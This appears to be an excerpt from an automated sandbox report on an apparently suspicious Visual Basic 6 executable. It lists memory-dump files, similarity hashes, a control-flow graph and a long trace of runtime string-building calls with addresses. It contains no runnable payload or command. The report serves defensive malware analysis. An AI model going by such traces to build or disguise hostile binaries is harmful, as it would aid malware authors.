                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID: "
                  • API String ID: 1778838933-123907689
                  • Opcode ID: 46563d9030cd06513c693f92c43473bf9d68ffdef123eb0d220882b6177cb01c
                  • Instruction ID: 7bf2c959d80067fde81453dcf158a3cd871a1d2ab3cca21de9be32d587700041
                  • Opcode Fuzzy Hash: 46563d9030cd06513c693f92c43473bf9d68ffdef123eb0d220882b6177cb01c
                  • Instruction Fuzzy Hash: C1F0A77010620ADFDF22CF10DD10AAA3F61BF2E354F008426FB114A260C739C962EF6A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 4fc731-4fc85b __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 3 4fc85d 0->3 4 4fc861-4fc911 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 0->4 3->4 7 4fc917-4fc9c7 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 4->7 8 4fc913 4->8 11 4fc9cd-4fca3a __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 7->11 12 4fc9c9 7->12 8->7 15 4fca3c 11->15 16 4fca40-4fcb09 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 11->16 12->11 15->16 19 4fcb0f-4fccbb __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 16->19 20 4fcb0b 16->20 23 4fccbd 19->23 24 4fccc1-4fcdf3 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 19->24 20->19 23->24 27 4fcdf9-4fcee0 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 24->27 28 4fcdf5 24->28 31 4fcee6-4fcf97 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 27->31 32 4fcee2 27->32 28->27 35 4fcf9d-4fcfec __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStr 31->35 36 4fcf99 31->36 32->31 39 4fcfee 35->39 40 4fcff2-4fd142 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 __vbaSetSystemError __vbaFreeStrList 35->40 36->35 39->40 43 4fd148-4fd245 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 * 2 call 40bc24 40->43 44 4fd144 40->44 46 4fd24a-4fd299 __vbaSetSystemError __vbaFreeStrList 43->46 44->43 47 4fd29f-4fd2ed 46->47 48 4fd29b 46->48 48->47
                  APIs
                  • __vbaStrCat.MSVBVM60(0040BCE8,0040BD30), ref: 004FC796
                  • __vbaStrMove.MSVBVM60(0040BCE8,0040BD30), ref: 004FC7A0
                  • __vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7A7
                  • __vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7B1
                  • __vbaStrCat.MSVBVM60(0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7BC
                  • __vbaStrMove.MSVBVM60(0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7C6
                  • __vbaStrCat.MSVBVM60(0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7D1
                  • __vbaStrMove.MSVBVM60(0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7DB
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7E7
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7F1
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7FD
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC807
                  • #644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC80D
                  • #644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC816
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC827
                  • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C), ref: 004FC846
                  • __vbaStrCat.MSVBVM60(0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC86B
                  • __vbaStrMove.MSVBVM60(0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC875
                  • __vbaStrCat.MSVBVM60(0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC880
                  • __vbaStrMove.MSVBVM60(0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC88A
                  • __vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC895
                  • __vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC89F
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8A6
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8B0
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8B7
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8C1
                  • #644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8C7
                  • #644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8D0
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC8E1
                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000), ref: 004FC8FC
                  • __vbaStrCat.MSVBVM60(0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC921
                  • __vbaStrMove.MSVBVM60(0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC92B
                  • __vbaStrCat.MSVBVM60(0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC936
                  • __vbaStrMove.MSVBVM60(0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC940
                  • __vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC94B
                  • __vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC955
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC95C
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC966
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC96D
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC977
                  • #644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FC97D
                  • #644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000), ref: 004FC986
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000), ref: 004FC997
                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000), ref: 004FC9B2
                  • __vbaStrCat.MSVBVM60(0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC9D7
                  • __vbaStrMove.MSVBVM60(0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC9E1
                  • __vbaStrCat.MSVBVM60(0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC9EC
                  • __vbaStrMove.MSVBVM60(0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC9F6
                  • #644.MSVBVM60(00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FC9FC
                  • #644.MSVBVM60(00000000,00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000), ref: 004FCA05
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000), ref: 004FCA16
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0), ref: 004FCA25
                  • __vbaStrCat.MSVBVM60(0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FCA4A
                  • __vbaStrMove.MSVBVM60(0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FCA54
                  • __vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74), ref: 004FCA5F
                  • __vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74), ref: 004FCA69
                  • __vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4), ref: 004FCA74
                  • __vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4), ref: 004FCA7E
                  • __vbaStrCat.MSVBVM60(0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0), ref: 004FCA89
                  • __vbaStrMove.MSVBVM60(0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0), ref: 004FCA93
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8), ref: 004FCA9A
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8), ref: 004FCAA4
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4), ref: 004FCAAB
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4), ref: 004FCAB5
                  • #644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC), ref: 004FCABB
                  • #644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C), ref: 004FCAC4
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC), ref: 004FCAD5
                  • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C), ref: 004FCAF4
                  • __vbaStrCat.MSVBVM60(0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000), ref: 004FCB19
                  • __vbaStrMove.MSVBVM60(0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000), ref: 004FCB23
                  • __vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000), ref: 004FCB2E
                  • __vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000), ref: 004FCB38
                  • __vbaStrCat.MSVBVM60(0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC), ref: 004FCB43
                  • __vbaStrMove.MSVBVM60(0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC), ref: 004FCB4D
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000), ref: 004FCB54
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000), ref: 004FCB5E
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08), ref: 004FCB65
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08), ref: 004FCB6F
                  • __vbaStrCat.MSVBVM60(0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0), ref: 004FCB7A
                  • __vbaStrMove.MSVBVM60(0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0), ref: 004FCB84
                  • __vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4), ref: 004FCB8F
                  • __vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4), ref: 004FCB99
                  • __vbaStrCat.MSVBVM60(0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC), ref: 004FCBA4
                  • __vbaStrMove.MSVBVM60(0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC), ref: 004FCBAE
                  • __vbaStrCat.MSVBVM60(0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000), ref: 004FCBB9
                  • __vbaStrMove.MSVBVM60(0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000), ref: 004FCBC3
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000), ref: 004FCBCF
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000), ref: 004FCBD9
                  • __vbaStrCat.MSVBVM60(0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000), ref: 004FCBE4
                  • __vbaStrMove.MSVBVM60(0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000), ref: 004FCBEE
                  • __vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000), ref: 004FCBF9
                  • __vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000), ref: 004FCC03
                  • __vbaStrCat.MSVBVM60(0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000), ref: 004FCC0E
                  • __vbaStrMove.MSVBVM60(0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000), ref: 004FCC18
                  • __vbaStrCat.MSVBVM60(0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000), ref: 004FCC23
                  • __vbaStrMove.MSVBVM60(0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000,0040BCD8,00000000), ref: 004FCC2D
                  • __vbaStrCat.MSVBVM60(0040BFE4,00000000,0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000), ref: 004FCC38
                  • __vbaStrMove.MSVBVM60(0040BFE4,00000000,0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20,00000000), ref: 004FCC42
                  • #644.MSVBVM60(00000000,0040BFE4,00000000,0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000,0040BD20), ref: 004FCC48
                  • #644.MSVBVM60(00000000,00000000,0040BFE4,00000000,0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000,0040B648,00000000), ref: 004FCC52
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BFE4,00000000,0040BFE4,00000000,0040BD20,00000000,0040BCE8,00000000,0040BFDC,00000000,0040BCD0,00000000), ref: 004FCC63
                  • __vbaFreeStrList.MSVBVM60(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FCCA6
                  • __vbaStrCat.MSVBVM60(0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000), ref: 004FCCC7
                  • __vbaStrMove.MSVBVM60(0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000), ref: 004FCCD1
                  • __vbaStrCat.MSVBVM60(0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000), ref: 004FCCDC
                  • __vbaStrMove.MSVBVM60(0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000), ref: 004FCCE6
                  • __vbaStrCat.MSVBVM60(0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000), ref: 004FCCF1
                  • __vbaStrMove.MSVBVM60(0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000), ref: 004FCCFB
                  • __vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000), ref: 004FCD06
                  • __vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000,0040B8FC,00000000), ref: 004FCD10
